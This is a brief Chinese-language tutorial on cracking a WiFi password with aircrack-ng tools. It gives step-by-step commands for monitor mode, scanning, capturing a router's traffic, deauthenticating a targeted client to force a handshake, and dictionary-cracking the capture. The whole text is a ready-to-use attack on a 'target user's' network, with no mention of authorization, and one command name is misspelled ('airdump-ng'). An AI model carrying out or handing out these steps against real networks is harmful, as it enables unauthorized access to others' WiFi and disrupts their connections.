前期准备

1、一个无线网卡
2、密钥爆破字典

实站过程

1、设置wlan为监听模式

airmon-ng start wlan0   #开启网卡wlan0监听模式
iwconfig                #查看网卡状态，发现wlan0mon，表示已开启成功

2、探测附近WiFi

airdump-ng wlan0mon

BSSID 代表路由器的MAC地址；

PWR 代表信号的强度，数值越大代表信息越强；

CH 代表信道；

ENC代表用的加密的方式；

AUTH 代表认证的方式；

ESSID是WIFI的名字；

3、监听路由

sudo airodump-ng -c 8 -w  /home/wifi  --bssid F0:16:28:21:FB:EA  wlan0mon

-c 信道数

-w cap存储路径

-bssid AP mac地址

4、对目标用户发起攻击使其掉线

对目标用户发起攻击使其掉线，wifi重连，获取一次握手数据包

aireplay-ng -0 5 -a F0:16:28:21:FB:EA -c 04:8C:9A:56:EB:BC wlan0mon

-0 5 攻击模式 攻击次数

-a AP mac地址

-c 用户的 mac地址

5、数据包重放破解wifi密码

aircrack-ng -w /home/pass.txt -b F0:16:28:21:FB:EA  /home/wifi-01.cap

-w 密码字典路径

-b AP mac地址

上一步流量包路径